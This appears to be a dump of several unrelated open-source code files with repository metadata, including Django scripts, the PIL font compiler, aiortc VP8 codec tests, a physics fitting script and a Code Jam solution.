add_page(cat=python_cat,
title="How to Think like a Computer Scientist",
url="http://www.greenteapress.com/thinkpython/",
views=32)
add_page(cat=python_cat,
title="Learn Python in 10 Minutes",
url="http://www.korokithakis.net/tutorials/python/",
views=64)
django_cat = add_cat(name="Django",
views=64, likes=32)
add_page(cat=django_cat,
title="Official Django Tutorial",
url="https://docs.djangoproject.com/en/1.5/intro/tutorial01/",
views=128)
add_page(cat=django_cat,
title="Django Rocks",
url="http://www.djangorocks.com/",
views=256)
add_page(cat=django_cat,
title="How to Tango with Django",
url="http://www.tangowithdjango.com/",
views=512)
frame_cat = add_cat(name="Other Frameworks",
views=32, likes=16)
add_page(cat=frame_cat,
title="Bottle",
url="http://bottlepy.org/docs/dev/",
views=400)
add_page(cat=frame_cat,
title="Flask",
url="http://flask.pocoo.org",
views=300)
# Print out what we have added to the user.
for c in Category.objects.all():
for p in Page.objects.filter(category=c):
print "- {0} - {1}".format(str(c), str(p))
def add_page(cat, title, url, views=0):
p = Page.objects.get_or_create(category=cat, title=title)[0]
p.url = url
p.views = views
p.save()
return p
def add_cat(name, views, likes):
# The get_or_create() method returns a tuple of (object, created).
c = Category.objects.get_or_create(name=name)[0]
c.views = views
c.likes = likes
c.save()
return c
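
# Illustrative note (added, not part of the tutorial script): get_or_create() can also be
# unpacked directly so the "created" flag is explicit, e.g.
#   cat, created = Category.objects.get_or_create(name="Python")
#   if created:
#       cat.views = 0
#       cat.save()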
# Start execution here!
if __name__ == '__main__':
print "Starting Rango population script..."
populate()
|
[
"lyp_login@outlook.com"
] |
lyp_login@outlook.com
|
bfa5b4a6470235a489f54741c7f0f9fe574cef1a
|
1c0505803cf4ebe42bd1f6f369c949c35d7a4d5b
|
/ConceptZI/asgi.py
|
24e3f6d0b87254642df1b96f867bea4629215e26
|
[] |
no_license
|
tahirs95/django_stripe_sepa
|
37d6787e0e5cb9e88dea7a94c3edcb07902f6fc1
|
8ed597be78aee9f84569562d4cd187485f750cb4
|
refs/heads/main
| 2023-08-22T19:16:35.786920
| 2021-10-01T16:22:36
| 2021-10-01T16:22:36
| 412,537,848
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 395
|
py
|
"""
ASGI config for ConceptZI project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ConceptZI.settings")
application = get_asgi_application()
|
[
"tahirs95@hotmail.com"
] |
tahirs95@hotmail.com
|
ed93de707065f2b8a365587714ca37565801df90
|
6d395ffb748ac60733e9a5f039e2a307adae44d4
|
/api/views_dir/xcx/page_group.py
|
ee7abc895b1e88940fd96cd77f904775668ab555
|
[] |
no_license
|
itcastpeng/hzWebSiteApi
|
4f69c0f68dc78eebc4a5dad668d03e3c9d9c1d57
|
f2bcd7a9ef28bf9c7f867e803f35d7b307d25527
|
refs/heads/master
| 2021-03-06T14:26:34.923464
| 2020-03-10T04:07:27
| 2020-03-10T04:07:27
| 246,204,894
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,787
|
py
|
from api import models
from publicFunc import Response
from publicFunc import account
from django.http import JsonResponse
from publicFunc.condition_com import conditionCom
from api.forms.xcx.page_group import SelectForm
import json
# @account.is_token(models.UserProfile)
def page_group(request):
response = Response.ResponseObj()
if request.method == "GET":
forms_obj = SelectForm(request.GET)
if forms_obj.is_valid():
current_page = forms_obj.cleaned_data['current_page']
length = forms_obj.cleaned_data['length']
print('forms_obj.cleaned_data -->', forms_obj.cleaned_data)
order = request.GET.get('order', '-create_datetime')
field_dict = {
'id': '',
'template_id': '',
'name': '__contains',
'create_datetime': '',
}
q = conditionCom(request, field_dict)
print('q -->', q)
objs = models.PageGroup.objects.filter(q).order_by(order)
count = objs.count()
if length != 0:
start_line = (current_page - 1) * length
stop_line = start_line + length
objs = objs[start_line: stop_line]
            # data to return
ret_data = []
default_page_id = None
for obj in objs:
                # fetch the pages under this group
page_objs = obj.page_set.all()
page_data = []
for page_obj in page_objs:
if not default_page_id:
default_page_id = page_obj.id
page_data.append({
'id': page_obj.id,
'name': page_obj.name
})
                # append the queried record to the result list
ret_data.append({
'id': obj.id,
'name': obj.name,
'page_data': page_data,
'create_datetime': obj.create_datetime.strftime('%Y-%m-%d %H:%M:%S'),
})
            # query succeeded, return status code 200
response.code = 200
response.msg = '查询成功'
response.data = {
'ret_data': ret_data,
'data_count': count,
'default_page_id': default_page_id,
}
response.note = {
'id': "页面分组id",
'name': '页面分组名称',
'create_datetime': '创建时间',
}
else:
response.code = 402
response.msg = "请求异常"
response.data = json.loads(forms_obj.errors.as_json())
return JsonResponse(response.__dict__)
|
[
"15531506906@sina.cn"
] |
15531506906@sina.cn
|
467737aa13e6224c2b5459fae510519622e05c84
|
b4c11d69197ef90dcacc8e34884036e4f576855e
|
/Python/myEnvironment/djangoEnv/bin/pilfont.py
|
146697b69ee3a1e8db89379b57baf96f2fd4437e
|
[] |
no_license
|
VT-Zhang/PYTHON_Platform_Works
|
c6314715e207995cce0244c38c8d48f95cf934b8
|
52654ef0ecf9102bfe378540818ebbb2dc27a134
|
refs/heads/master
| 2021-06-15T02:22:03.868898
| 2017-03-07T16:20:26
| 2017-03-07T16:20:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,085
|
py
|
#!/Users/jianzhang/Dropbox/Dojo/Python/myEnvironment/djangoEnv/bin/python2.7
#
# The Python Imaging Library
# $Id$
#
# PIL raster font compiler
#
# history:
# 1997-08-25 fl created
# 2002-03-10 fl use "from PIL import"
#
from __future__ import print_function
import glob
import sys
# drivers
from PIL import BdfFontFile
from PIL import PcfFontFile
VERSION = "0.4"
if len(sys.argv) <= 1:
print("PILFONT", VERSION, "-- PIL font compiler.")
print()
print("Usage: pilfont fontfiles...")
print()
print("Convert given font files to the PIL raster font format.")
print("This version of pilfont supports X BDF and PCF fonts.")
sys.exit(1)
files = []
for f in sys.argv[1:]:
files = files + glob.glob(f)
for f in files:
print(f + "...", end=' ')
try:
fp = open(f, "rb")
try:
p = PcfFontFile.PcfFontFile(fp)
except SyntaxError:
fp.seek(0)
p = BdfFontFile.BdfFontFile(fp)
p.save(f)
except (SyntaxError, IOError):
print("failed")
else:
print("OK")
|
[
"jianz@vt.edu"
] |
jianz@vt.edu
|
5160df22bf339592d41b4ff90b972fa65bcbcd93
|
773c02448ad1766270583cadcbb5c2c71347efd2
|
/T2_img2latent.py
|
0a200f93eb514a9c131e57b12e6605ca580d353a
|
[] |
no_license
|
thoppe/SyntheticCountenance
|
b4640c8009ba5bc2377a11aac88cc1be75d7b92c
|
c06e186fb0596a50d9080b38b80d81c58f2bdde4
|
refs/heads/master
| 2020-04-14T19:36:12.431157
| 2019-02-02T22:05:20
| 2019-02-02T22:05:20
| 164,064,092
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,142
|
py
|
"""
The idea is to find the img such that D(img) is minimized, that is the picture
that _most_ fools the discriminator.
"""
import numpy as np
import os, json, glob, random, h5py
from tqdm import tqdm
import tensorflow as tf
from src.GAN_model import GAN_output_to_RGB, RGB_to_GAN_output
from src.img2latent import Image2Latent
def image_pipeline(batch_size=5):
f_h5 = 'samples/PGAN_small_images.h5'
with h5py.File(f_h5, 'r') as h5:
N = len(h5['Z'])
Z = h5['Z'][...]
while True:
idx = np.random.randint(0, N, size=batch_size)
img = np.array([h5['IMG'][i] for i in idx])
img = RGB_to_GAN_output(img, batch_size=batch_size, resize=False)
yield Z[idx], img
if __name__ == "__main__":
batch_size = 32
n_epochs = 2000
n_save_every = 50
ITR = image_pipeline(batch_size)
clf = Image2Latent(batch_size=batch_size)
while True:
for n, (z,img) in enumerate(ITR):
if n%n_save_every == 0:
clf.render(z, img)
#s = clf.save()
lx = clf.train(z, img)
print(n, lx)
|
[
"travis.hoppe@gmail.com"
] |
travis.hoppe@gmail.com
|
83c5bdc03f15bf3062de8e162dc37d0640411c79
|
71c7683331a9037fda7254b3a7b1ffddd6a4c4c8
|
/Phys/BsKstKst/python/BsKstKst/FitMassAngles/Param_Diego/for_Juan.py
|
c5a03c629416915abae29c06369469f6b4fd23be
|
[] |
no_license
|
pseyfert-cern-gitlab-backup/Urania
|
edc58ba4271089e55900f8bb4a5909e9e9c12d35
|
1b1c353ed5f1b45b3605990f60f49881b9785efd
|
refs/heads/master
| 2021-05-18T13:33:22.732970
| 2017-12-15T14:42:04
| 2017-12-15T14:42:04
| 251,259,622
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,717
|
py
|
from ROOT import *
from math import *
from array import *
from Urania import PDG
from Urania.Helicity import *
from Urania import RooInterfaces as D
# Generate the pdf using the tools in Urania.Helicity
A = doB2VX([0,1,2], helicities = [0], transAmp = 1)#0)
### massage the expression a bit to make it more suitable for fitting
pdf_split = DecomposeAmplitudes(A,TransAmplitudes.values())#H.values())
pdf_delete = {}
ape = TransAmplitudes["1_pe"]
a_s = TransAmplitudes["0_0"]
for ak in TransAmplitudes.values():
if ape==ak: continue
if a_s==ak: continue
_re, _im = TermsAsReImag(A,ak,ape)
pdf_delete[re(ak*ape.conjugate())]=_re
pdf_delete[im(ak*ape.conjugate())]=_im
pdf_delete[re(ape*ak.conjugate())]=_re
pdf_delete[im(ape*ak.conjugate())]=_im
phys = 0
for key in pdf_split:
if key in pdf_delete.keys():
print "deleting ",key
continue
phys += StrongPhases(key)*pdf_split[key]
### change the free variables to cosines
x = Symbol("helcosthetaK",real = True)
y = Symbol("helcosthetaL", real = True)
z = Symbol("helphi", real = True)
CThL = Cos(ThetaL)
CThK = Cos(ThetaK)
def changeFreeVars(function):
function = function.subs( Sin(2*ThetaK), 2*Sin(ThetaK)*Cos(ThetaK) )
function = function.subs( Cos(2*ThetaK), Cos(ThetaK)**2 - Sin(ThetaK)**2)
function = function.subs( Sin(2*ThetaL), 2*Sin(ThetaL)*Cos(ThetaL) )
function = function.subs( Cos(2*ThetaL), Cos(ThetaL)**2 - Sin(ThetaL)**2)
function = function.subs( Sin(ThetaK), Sqrt(1-Cos(ThetaK)**2))
function = function.subs( Sin(ThetaL), Sqrt(1-Cos(ThetaL)**2))
function = function.subs([(CThK,x),(CThL,y), (Phi,z)])
return function
func = changeFreeVars(phys)
c1_th1 = Symbol("c1th1",real=True)
c2_th1 = Symbol("c2th1",real=True)
c3_th1 = Symbol("c3th1",real=True)
c4_th1 = Symbol("c4th1",real=True)
y_th1 = Symbol("yth1",real=True)
c1_th2 = Symbol("c1th2",real=True)
c2_th2 = Symbol("c2th2",real=True)
c3_th2 = Symbol("c3th2",real=True)
c4_th2 = Symbol("c4th2",real=True)
y_th2 = Symbol("yth2",real=True)
acc_coefs = [c1_th1,c2_th1,c3_th1,c4_th1,y_th1,c1_th2,c2_th2,c3_th2,c4_th2,y_th2]
c5_th1 = y_th1-(1+c1_th1+c2_th1+c3_th1+c4_th1)
c5_th2 = y_th2-(1+c1_th2+c2_th2+c3_th2+c4_th2)
acc1 = 1 + c1_th1*x + c2_th1*x*x + c3_th1*x*x*x + c4_th1*x*x*x*x + c5_th1*x*x*x*x*x
acc2 = 1 + c1_th2*y + c2_th2*y*y + c3_th2*y*y*y + c4_th2*y*y*y*y + c5_th2*y*y*y*y*y
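# Added note (not in the original script): with c5_th1 and c5_th2 defined as above, the
# quintic acceptance is pinned at the upper edge of the range: acc1 evaluated at x = 1 gives
# 1 + c1 + c2 + c3 + c4 + c5 = y_th1 (and likewise acc2 at y = 1 gives y_th2), so the
# yth1/yth2 parameters directly set the acceptance value at cos(theta) = 1.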
# func = func*acc1*acc2
##### Generate and compile a fitting class corresponding to "func"
### Trial 1, w/o analytical integrals
op = D.RooClassGenerator(func*acc1*acc2, [x,y,z]+TransAmpModuli.values()+TransAmpPhases.values()+acc_coefs,"AngularPDFAcc_2011")
# op = D.RooClassGenerator(func, [x,y,z]+TransAmpModuli.values()+TransAmpPhases.values(),"AngularPDFNoAcc")
op.makePdf(integrable = kTRUE) ## You can also use makeFunc to generate just a RooAbsReal. Still not tested though
op.doIntegral(1,(x,-1,1))
op.doIntegral(2,(y,-1,1))
op.doIntegral(3,(z,-Pi,Pi))
op.doIntegral(4,(x,-1,1),(y,-1,1))
op.doIntegral(5,(x,-1,1),(z,-Pi,Pi))
op.doIntegral(6,(y,-1,1),(z,-Pi,Pi))
op.doIntegral(7,(x,-1,1),(y,-1,1),(z,-Pi,Pi))
op.overwrite()
### Trial 2, now lets generate a version using analytical integrals
# op2 = D.RooClassGenerator(func, [x,y,z]+TransAmpModuli.values()+TransAmpPhases.values()+acc_coefs,"RooSecond")
# op2.makePdf(integrable = kTRUE)
# op2.doIntegral(1,(x,-1,1))
# op2.doIntegral(2,(y,-1,1))
# op2.doIntegral(3,(z,-Pi,Pi))
# op2.doIntegral(4,(x,-1,1),(y,-1,1))
# op2.doIntegral(5,(x,-1,1),(z,-Pi,Pi))
# op2.doIntegral(6,(y,-1,1),(z,-Pi,Pi))
# op2.doIntegral(7,(x,-1,1),(y,-1,1),(z,-Pi,Pi))
# op2.overwrite()
### Compile online the two models and load the class to python
op.invoke()#, op2.invoke()
BREAK
gROOT.ProcessLine(".x RooSecond.cxx+")
############## MAKING TREE
plot = 1
label = 'PLOT'
f = TFile("${WHOME}/NTuples_Bs2KstKst_strip17/public/Bs2KstKst_generated_MC11_angles.root")
tree=f.Get("T")
f1=TFile("/tmp/trash.root","recreate")
tree1 = tree.CopyTree("1")
tree2 = tree.CopyTree("1")
################### CONSTRUCTING THE MODEL
CThetaL = RooRealVar("CosTheta1","cos(ThetaL) ", -1,1)
CThetaK = RooRealVar("CosTheta2","cos(ThetaK) ", -1,1)
Phi = RooRealVar("Phi","Phi", -pi,pi)
A0 = RooRealVar("A0","A0",0.77,0.5,1.)
Apa = RooRealVar("Apa","Apa",0.5,0.3,1.)
As = RooRealVar("As" ,"As" ,1/2,0.,1.)
Ape = RooFormulaVar("Ape","Ape","sqrt(1-As*As-Apa*Apa-A0*A0)",RooArgList(A0,As,Apa))
deltaPa = RooRealVar("deltaPa","deltaPa",2.501,0.,2*pi)
deltaPe = RooRealVar("deltaPe","deltaPe",0.)#1, -pi,pi)
deltaS = RooRealVar("deltaS" ,"deltaS" ,0.9,0.,2*pi)
model=RooFirst("model","model",CThetaK,CThetaL,Phi,Apa,Ape,As,A0,deltaPa,deltaPe,deltaS)
# model2=RooSecond("model2","model2",CThetaK,CThetaL,Phi,Apa,Ape,As,A0,deltaPa,deltaPepi,deltaS)
################### FITTING DATA
### tree - mix of B & Bbar
### tree1 - K+
### tree2 - K-
data = RooDataSet(label, label,tree1,RooArgSet(CThetaL,CThetaK,Phi))
#data = model.generate(RooArgSet(CThetaL,CThetaK,Phi),100000) ;
As.setVal(0)
As.setConstant(kTRUE)
deltaS.setConstant(kTRUE)
#deltaPe.setConstant(kTRUE)
def test(model,cv):
res = model.fitTo(data,RooFit.Minos(kTRUE))#, RooFit.Range("REDUCED"))
cv.Divide(2,2)
cv.cd(1)
Angframe = CThetaK.frame()
data.plotOn(Angframe)
model.plotOn(Angframe)
Angframe.Draw()
cv.cd(2)
Angframeb = CThetaL.frame()
data.plotOn(Angframeb)
model.plotOn(Angframeb)
Angframeb.Draw()
cv.cd(3)
Angframec = Phi.frame()
data.plotOn(Angframec)
model.plotOn(Angframec)
Angframec.Draw()
return res, Angframe, Angframeb, Angframec
cv = TCanvas()
w_1 = test(model,cv)
# w_2 = test(model2)
################ DRAWING
|
[
"liblhcb@cern.ch"
] |
liblhcb@cern.ch
|
c48e575ae1fb8a2c929db8e5ce19ddf8a1db5e42
|
989b3499948137f57f14be8b2c77d0610d5975e6
|
/python-package/daily_study/python/question_python(resolved)/chapter4_conditional_and_loops(완결)/iii_five_seven.py
|
978209ab4157d0feb585ee846dc3b32fb9719737
|
[] |
no_license
|
namkiseung/python_BasicProject
|
76b4c070934ad4cb9d16ce844efa05f64fb09ac0
|
460d05248b2d1431624aba960e28bece888643e4
|
refs/heads/master
| 2022-12-13T21:12:06.865241
| 2020-04-23T01:30:08
| 2020-04-23T01:30:08
| 142,980,920
| 1
| 1
| null | 2022-12-08T02:27:40
| 2018-07-31T07:49:17
|
Python
|
UTF-8
|
Python
| false
| false
| 838
|
py
|
# -*- coding: utf-8 -*-
def five_seven(x, y):
    """ Return, as a comma-separated string, the numbers in the range between the two given
    numbers (both boundaries inclusive) that are divisible by 7 and are multiples of 5.
    sample in/out:
        five_seven(1500, 1600) -> "1505, 1540, 1575"
        five_seven(1500, 1700) -> "1505, 1540, 1575, 1610, 1645, 1680"
    """
    result = []
    # among the numbers from x to y
    for num in range(x, y + 1):
        # keep those divisible by both 7 and 5
        if num % 7 == 0 and num % 5 == 0:
            result.append(str(num))
    return ", ".join(result)


if __name__ == "__main__":
    print(five_seven(1500, 1600))
    print(five_seven(1500, 1700))
|
[
"rlzld100@gmail.com"
] |
rlzld100@gmail.com
|
0ac4e38308fb4ff518727b8ee1195fa098b9eb57
|
9a94357b2cc45b1e6a56c5c309fad0f717e96b2b
|
/tests/test_vpx.py
|
108360a809ec883ab5d5c6b8521ffbd7c1e719a3
|
[
"BSD-3-Clause"
] |
permissive
|
gitter-badger/aiortc
|
34099aee833a56d36f53b74336a2e7344d274cf3
|
0417b6b9c75dd4fc9f049ddeda7f09f306318574
|
refs/heads/master
| 2020-03-30T11:22:22.704701
| 2018-10-01T12:49:46
| 2018-10-01T13:16:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,489
|
py
|
from unittest import TestCase
from aiortc.codecs import get_decoder, get_encoder
from aiortc.codecs.vpx import (Vp8Decoder, Vp8Encoder, VpxPayloadDescriptor,
_vpx_assert, number_of_threads)
from aiortc.mediastreams import VIDEO_TIME_BASE, VideoFrame
from aiortc.rtcrtpparameters import RTCRtpCodecParameters
from .codecs import CodecTestCase
VP8_CODEC = RTCRtpCodecParameters(name='VP8', clockRate=90000)
class VpxPayloadDescriptorTest(TestCase):
def test_no_picture_id(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x10')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, None)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x10')
self.assertEqual(repr(descr), 'VpxPayloadDescriptor(S=1, PID=0, pic_id=None)')
self.assertEqual(rest, b'')
def test_short_picture_id_17(self):
"""
From RFC 7741 - 4.6.3
"""
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x11')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, 17)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\x80\x11')
self.assertEqual(repr(descr), 'VpxPayloadDescriptor(S=1, PID=0, pic_id=17)')
self.assertEqual(rest, b'')
def test_short_picture_id_127(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x7f')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, 127)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\x80\x7f')
self.assertEqual(rest, b'')
def test_long_picture_id_128(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x80\x80')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, 128)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\x80\x80\x80')
self.assertEqual(rest, b'')
def test_long_picture_id_4711(self):
"""
From RFC 7741 - 4.6.5
"""
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x92\x67')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, 4711)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\x80\x92\x67')
self.assertEqual(rest, b'')
def test_tl0picidx(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x90\xc0\x92\x67\x81')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, 4711)
self.assertEqual(descr.tl0picidx, 129)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\xc0\x92\x67\x81')
self.assertEqual(rest, b'')
def test_tid(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x20\xe0')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, None)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, (3, 1))
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\x20\xe0')
self.assertEqual(rest, b'')
def test_keyidx(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x10\x1f')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, None)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, 31)
self.assertEqual(bytes(descr), b'\x90\x10\x1f')
self.assertEqual(rest, b'')
class Vp8Test(CodecTestCase):
def test_assert(self):
with self.assertRaises(Exception) as cm:
_vpx_assert(1)
self.assertEqual(str(cm.exception), 'libvpx error: Unspecified internal error')
def test_decoder(self):
decoder = get_decoder(VP8_CODEC)
self.assertTrue(isinstance(decoder, Vp8Decoder))
def test_encoder(self):
encoder = get_encoder(VP8_CODEC)
self.assertTrue(isinstance(encoder, Vp8Encoder))
frame = VideoFrame(width=640, height=480)
frame.pts = 0
frame.time_base = VIDEO_TIME_BASE
payloads, timestamp = encoder.encode(frame)
self.assertEqual(len(payloads), 1)
self.assertTrue(len(payloads[0]) < 1300)
self.assertEqual(timestamp, 0)
# change resolution
frame = VideoFrame(width=320, height=240)
frame.pts = 3000
frame.time_base = VIDEO_TIME_BASE
payloads, timestamp = encoder.encode(frame)
self.assertEqual(len(payloads), 1)
self.assertTrue(len(payloads[0]) < 1300)
self.assertEqual(timestamp, 3000)
def test_encoder_large(self):
encoder = get_encoder(VP8_CODEC)
self.assertTrue(isinstance(encoder, Vp8Encoder))
# first keyframe
frame = VideoFrame(width=2560, height=1920)
frame.pts = 0
frame.time_base = VIDEO_TIME_BASE
payloads, timestamp = encoder.encode(frame)
self.assertEqual(len(payloads), 7)
self.assertEqual(len(payloads[0]), 1300)
self.assertEqual(timestamp, 0)
# delta frame
frame = VideoFrame(width=2560, height=1920)
frame.pts = 3000
frame.time_base = VIDEO_TIME_BASE
payloads, timestamp = encoder.encode(frame)
self.assertEqual(len(payloads), 1)
self.assertTrue(len(payloads[0]) < 1300)
self.assertEqual(timestamp, 3000)
# force keyframe
frame = VideoFrame(width=2560, height=1920)
frame.pts = 6000
frame.time_base = VIDEO_TIME_BASE
payloads, timestamp = encoder.encode(frame, force_keyframe=True)
self.assertEqual(len(payloads), 7)
self.assertEqual(len(payloads[0]), 1300)
self.assertEqual(timestamp, 6000)
def test_number_of_threads(self):
self.assertEqual(number_of_threads(1920 * 1080, 16), 8)
self.assertEqual(number_of_threads(1920 * 1080, 8), 3)
self.assertEqual(number_of_threads(1920 * 1080, 4), 2)
self.assertEqual(number_of_threads(1920 * 1080, 2), 1)
def test_roundtrip_1280_720(self):
self.roundtrip_video(VP8_CODEC, 1280, 720)
def test_roundtrip_960_540(self):
self.roundtrip_video(VP8_CODEC, 960, 540)
def test_roundtrip_640_480(self):
self.roundtrip_video(VP8_CODEC, 640, 480)
def test_roundtrip_320_240(self):
self.roundtrip_video(VP8_CODEC, 320, 240)
|
[
"jeremy.laine@m4x.org"
] |
jeremy.laine@m4x.org
|
b2e1e547eb7cb40072a470450961ec3ea2a10584
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_118/652.py
|
4beb500f3c8a4122fb591a82efec72a0653e53da
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,386
|
py
|
n = int(raw_input())
for c in range(n):
(A,B) = (int(r) for r in raw_input().split(' '))
L = len(str(B))
ans = []
out = 0
# The odd ones out
for v in (1,4,9):
if A <= v <= B:
ans.append(v)
out += 1
# Twos
for d in range(L/2+2):
s = '2'+'0'*d+'2'
sq = int(s)**2
#print s,sq
if A <= sq <= B: out += 1
if A <= sq <= B: ans.append(sq)
for d in range(L/4+2):
s = '2'+'0'*d+'1'+'0'*d+'2'
sq = int(s)**2
if A <= sq <= B: out += 1
if A <= sq <= B: ans.append(sq)
# Binary
p = [0,0,0,0,0]
beg = set()
for p[0] in range(L/4+2):
for p[1] in range(min(p[0],L/4+1),L/4+2):
for p[2] in range(min(p[1],L/4+1),L/4+2):
for p[3] in range(min(p[2],L/4+1),L/4+2):
for p[4] in range(min(p[3],L/4+1),L/4+2):
s = ['0'] * (L/4+1)
for pos in range(5):
if p[pos] < (L/4+1): s[p[pos]] = '1'
a = ''.join(s)
a = a[(a+'1').find('1'):]
beg.add(a)
for b in beg:
if b:
if sum([int(u) for u in b]) >= 5: continue
rev = [b+b[::-1],b+'0'+b[::-1],b+'1'+b[::-1],b+'2'+b[::-1]]
for v in rev:
v2 = int(v)**2
s = str(v2)
if A <= v2 <= B and s == s[::-1]: out += 1
if A <= v2 <= B and s == s[::-1]: ans.append(v2)
print "Case #%d: %d" % (c+1,out)
#y = len(list(set(range(A,B+1)).intersection(set([1,4,9,121,484]))))
#print A,B, ans
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
95cd4d519c8b65d09a90e0a1a1ab1db1c5e65090
|
b677894966f2ae2d0585a31f163a362e41a3eae0
|
/ns3/pybindgen-0.17.0.post57+nga6376f2/tests/boost/wscript
|
575c486512db2596263726622d81756947c7266d
|
[
"LGPL-2.1-only",
"Apache-2.0"
] |
permissive
|
cyliustack/clusim
|
667a9eef2e1ea8dad1511fd405f3191d150a04a8
|
cbedcf671ba19fded26e4776c0e068f81f068dfd
|
refs/heads/master
| 2022-10-06T20:14:43.052930
| 2022-10-01T19:42:19
| 2022-10-01T19:42:19
| 99,692,344
| 7
| 3
|
Apache-2.0
| 2018-07-04T10:09:24
| 2017-08-08T12:51:33
|
Python
|
UTF-8
|
Python
| false
| false
| 1,018
|
## -*- python -*-
#from waflib import Task
import sys
import os.path
import os
import subprocess
# uncomment to enable profiling information
# epydoc uses the profile data to generate call graphs
#os.environ["PYBINDGEN_ENABLE_PROFILING"] = ""
if 0:
DEPRECATION_ERRORS = '-Werror::DeprecationWarning' # deprecations become errors
else:
DEPRECATION_ERRORS = '-Wdefault::DeprecationWarning' # normal python behaviour
def build(bld):
env = bld.env
env['TOP_SRCDIR'] = bld.srcnode.abspath()
bindgen = bld(
features='command',
source='barmodulegen.py',
target='barmodule.cc',
command='${PYTHON} %s ${SRC[0]} ${TOP_SRCDIR} > ${TGT[0]}' % (DEPRECATION_ERRORS,))
if env['CXX'] and env['ENABLE_BOOST_SHARED_PTR'] == True:
obj = bld(features='cxx cxxshlib pyext')
obj.source = [
'bar.cc',
'barmodule.cc'
]
obj.target = 'bar'
obj.install_path = None
obj.env.append_value("INCLUDES", '.')
|
[
"you@example.com"
] |
you@example.com
|
|
2aea9148c27a7fbf9f644d8c40edb2525fad701b
|
dd483c380c93edb21dae4cb0cb082ba0bfeb3e6a
|
/app/src/apps/stats/topological_stat/views.py
|
7c0caf2793ef1aa6e631cff093ebcec9992ed96e
|
[] |
no_license
|
BarbaraDiazE/D_Peptide_Builder
|
7aa4647c9b0ce20d8a258834d0dffaf21e368224
|
d47e29e0b9e55bd6e520bc9caf7d362e796d458d
|
refs/heads/master
| 2020-04-25T02:29:03.092694
| 2019-02-25T20:43:19
| 2019-02-25T20:43:19
| 172,440,859
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 546
|
py
|
from rest_framework.views import APIView
from django.http import HttpResponse
from django.shortcuts import render, render_to_response
import pandas as pd
import os
import glob
from .compute_topological import statTOPOLOGICAL
class TOPOLOGICALView(APIView):
def get(self, request):
csv_name = request.session['csv_name']
stat = statTOPOLOGICAL(csv_name)
stat_topological_html = stat.resolve()
context = {'loaded_data': stat_topological_html}
return render(request, 'stats_topological.html', context)
|
[
"debi_1223@hotmail.com"
] |
debi_1223@hotmail.com
|
1908f8673019ee60a62183f9409a6ca86cd08649
|
358519772669c73092f625f630722c38e1d33783
|
/ctools/Testing/Types/ImproperDihedral2Type.py
|
3855f86040c5114b8995f4d188699f85bb2a3205
|
[] |
no_license
|
minghao2016/mmtools
|
e7e61aca084498408ceae965dd6c9450ad89eafa
|
3ade988afb51cd54ee5a4067d8deaad88afbb0fe
|
refs/heads/master
| 2021-09-21T01:02:22.522187
| 2014-09-19T03:40:03
| 2014-09-19T03:40:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 557
|
py
|
import sys
sys.path.append('..')
